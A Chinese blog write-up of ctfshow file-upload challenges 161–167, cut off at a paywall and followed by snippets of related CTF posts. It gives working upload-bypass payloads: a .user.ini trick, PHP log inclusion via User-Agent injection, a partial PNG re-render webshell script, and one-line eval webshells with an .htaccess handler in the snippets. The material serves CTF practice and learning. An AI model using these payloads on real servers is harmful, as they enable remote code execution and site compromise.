ctfshow 文件上传161-167

已于 2022-04-08 01:08:06 修改
阅读量2k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: web 文章标签: php web安全
于 2022-04-08 01:07:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52671379/article/details/123995065

ctfshow 文件上传161-167


151-160: https://blog.youkuaiyun.com/qq_52671379/article/details/123977585

web161(关键字过滤,日志包含)

过滤了大部分关键字
可以利用日志包含绕过,图片内容
3duan.png

GIF89a
<?=include"/var/lo"."g/nginx/access.lo"."g"?>

因为log被过滤了。所以用拼接绕过
添加了文件头的检查,所以加入内容GIF89a绕过
思路:
.user.ini配置文件的利用
日志包含绕过
过滤system,反引号代替shell执行
步骤
先上传.user.ini.png文件(因为png为合法文件,之后抓包之后再修改文件名为.user.ini.)
然后再上传shell文件3duan.png
抓包修改ua头信息

User-Agent: <?=`tac ../f*` ?>

在这里插入图片描述访问/upload/index.php即可得到flag

web162 163(条件竞争)

没做出来,还在看
在这里插入图片描述在这里插入图片描述

web164(PNG图片二次渲染绕过)

PNG图片二次渲染配合文件包含漏洞原理:
将一句话木马插入到网站二次处理后的图片中,也就是把一句话插入图片在二次渲染后会保留的那部分数据里,确保不会在二次处理时删除掉。这样二次渲染后的图片中就存在了一句话,在配合文件包含漏洞获取webshell。
直接在图片中插入一句话会被删除掉,二次渲染会把上传到服务器的图片的代码改变,
利用脚本构造出一个png木马图片

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   
   
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round(
最低0.47元/天 解锁文章

200万优质内容无限畅学
CTFshow 文件上传 web161
Kradress的博客
02-15 478
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 在上传.user.ini发现失败,可能对文件内容进行检测 在多次尝试后,发现文件类型为image/png,文件头加上GIF89a而且文件不能太小,要多加点内容 其他都和上题一样 .user.ini GIF89a auto_prepend_file=shell.png shell.png 记得url解码 GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0
CTFshow 文件上传 web167
Kradress的博客
02-16 432
目录思路总结 思路 根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache 可以直接上传phtml,但是文件没有被成功解析.这时候可以上传.htaccess,对所有文件进行php解析 <?php echo 123;eval($_POST['kradress']);?> .htaccess Sethandler application/x-httpd-php <!-将该
ctfshow-web入门-文件上传web166、web167)&(web168-web170)免杀绕过
Welcome To Myon'Blog !
07-11 1889
查看源码,前端只让传 zip上传 zip 成功后可以进行下载随便搞一个压缩包,使用记事本编辑,在其内容里插入一句话木马:上传该压缩包,上传成功后点击下载文件,使用 burpsuite 抓包:我这里木马内容用的 request ,就在 get 里执行 ls 没什么问题,但是读取 flag 时识别有点问题,最好使用 post 请求,因此将请求方法改为 post ,将 file 的内容还原到上面。
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167
m0_60666452的博客
04-05 636
至于这个脚本是怎么绕过二次渲染,我也不能完全理解脚本原理,也许是根据P数组创造图片马能符合二次渲染不被渲染到的规律?这里希望能得到大家的指点。上传生成的图片,成功访问,抓包到上传的图片内容:说明里面的后门代码生效了,且内容在图片内容里面,抓包或者010editor等里面才看得出来,浏览器看不出来。开始常规操作:得到flag。但是当我传递0=eval,然后1=system()这种类型的时候,会对eval进行报错。原因:PHP对于a的函数形式称为可变函数,如果a是函数才可被调用,不是就会报错。
CTFshow-文件上传web161-170
qq_52579508的博客
08-12 369
一开始发现不管输入什么都不行 ,添加了GIF头成功通过上传校验第二步上传 图片,包含了日志的文件 进行解析第三步访问 /upload 目录会解析 日志文件添加user-agent 头里面 添加一句话第四步 连接shell 获取flag。
ctfshow-VIP题目-Web-详细解题思路
01-27
发现/editor目录,访问出现一个编辑器上传附件的地方,发现文件空间可以查看路径,发现一个nothinghere文件夹,比较可疑,里面找到fl000g.txt文件,访问/nothinghere/fl000g.txt,发现flag,flag:ctfshow{...}。...
CTFshow 文件上传 Web151-170复现笔记(保姆级复现
2401_83728643的博客
12-31 1563
ctfshow文件上传复现保姆级笔记
ctfshow-web入门-文件包含(web82-web86)条件竞争实现session会话文件包含
web13093320398的博客
12-23 1162
file_get_contents 函数将会读取文件的全部内容并将其作为字符串返回,strpos($content, “
CTFshow文件上传web入门151关-161关解密。包教包会!!!!
2301_77578012的博客
05-23 1557
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
ctfshow-web入门-文件上传web161web162、web163)远程包含
Welcome To Myon'Blog !
07-09 2604
后面又去 b 站看了下视频,发现它远程包含的就是一个 php 文件,而我这里包含的 shell 是一个纯文本的东西,我最开始以为是将这段内容包含进了 index.php 的代码里,所以就没有考虑它不是 php 后缀是否可以正常解析的问题。后面问了群里的师傅,说用 flask,我原本用的是 Apache 搭的服务,重置了服务器,Apache 和 php 其实都是刚下的,可能还需要配置点什么吧,不清楚,因此我们将木马放到 flask 服务上去。那么我们上传的文件名就不使用后缀即可:这里以 test 为例。
ctfshow web151-161文件上传一)
m0_74057302的博客
03-04 2219
我这一生如履薄冰,你说我还能到对岸吗???
ctfshow 文件上传 web151 - web161
最新发布
2301_78931332的博客
03-08 1014
ctfshow web151-161 文件上传
ctfshow web入门 web161-165
m0_62207170的博客
10-27 1288
ctfshow web入门 web161-165
CTFSHOW文件上传
羽的博客
11-19 9560
151 绕过前端验证 方法1:直接关闭浏览器的js 方法2:上传.png(没错,只能是png,gif和jpg都不行)文件然后bp抓包后修改后缀 152
ctfshow web162-170
m0_74057302的博客
03-13 2329
往事暗沉不可追,来日之路光明灿烂
ctfshow-web入门 文件上传篇部分题解
volcano的博客
03-06 7350
ctfshow文件上传web151-152web153(.user.ini绕过).user.iniweb154-155(短标签绕过+.user.ini绕过)短标签绕过web156web157-159web160(日志包含绕过)web161web162-163(session文件包含+条件竞争)条件竞争web164(png图片二次渲染绕过)web165(jpg图片二次渲染绕过)web166web167(.htaccess) 文件上传 web151-152 这两题步骤是一样的,先写一个一句话: <?ph
CTFshow 文件上传 web162
Kradress的博客
02-15 2301
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
ctfshow web入门 文件上传web162--web167
2301_81040377的博客
04-09 1115
我们上传的文件如果不符合要求,就会被删除,导致成功上传无法访问,没有用。但是如果我们上传的速度比服务器删的速度快,就可以了。#### 本题总结可能你们并不觉得这道题难但是这道题确实难到我了,我做了很久总结一下可能错误的点。一样的操作,如上题,如果代码跑不出来,要么忘记改要么就是没有放包。然后进入下载页面的时候抓包(“下载文件的时候抓包”)压缩文件太大或者太小导致上传不成功或者很难去。,你们可以自己修改,把脚本的也改了就是。访问上传的文件,进行命令执行。只能上传压缩文件,我们就在。里面添加一句话木马就行了。
ctfshow文件上传
09-02
您好!对于CTF Show文件上传的问题,我可以给您一些基本的指导。 在CTF(Capture The Flag)比赛中,文件上传通常是一个常见的题目类型。这类题目要求参赛选手利用漏洞或者绕过限制,成功将文件上传到目标服务器上。 常见的文件上传漏洞包括但不限于以下几种: 1. 后缀绕过:目标服务器对上传文件的后缀进行了限制,但未对文件内容进行验证。您可以尝试修改文件后缀名,或者在上传时使用一些特殊的字符来绕过后缀检测。 2. MIME类型绕过:目标服务器对上传文件的MIME类型进行了检测,但未对文件内容进行验证。您可以尝试修改文件的Content-Type头部信息,或者在上传时使用一些特殊的字符来绕过MIME类型检测。 3. 目录穿越:目标服务器未对文件路径进行合理的校验,您可以尝试通过上传包含特殊字符(如'../')的文件名来实现目录穿越,达到上传文件到其他目录的目的。 4. 文件包含漏洞:目标服务器存在文件包含漏洞时,您可以通过上传一个恶意文件,然后在适当的条件下触发该文件被包含,从而执行您所需要的操作。 需要注意的是,在实际的CTF比赛或者演练中,上传文件是一个涉及安全性的操作,务必遵循规则和道德准则,避免对他人系统造成不必要的损害。 希望这些信息对您有所帮助!如果您有其他问题,请随时提问。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值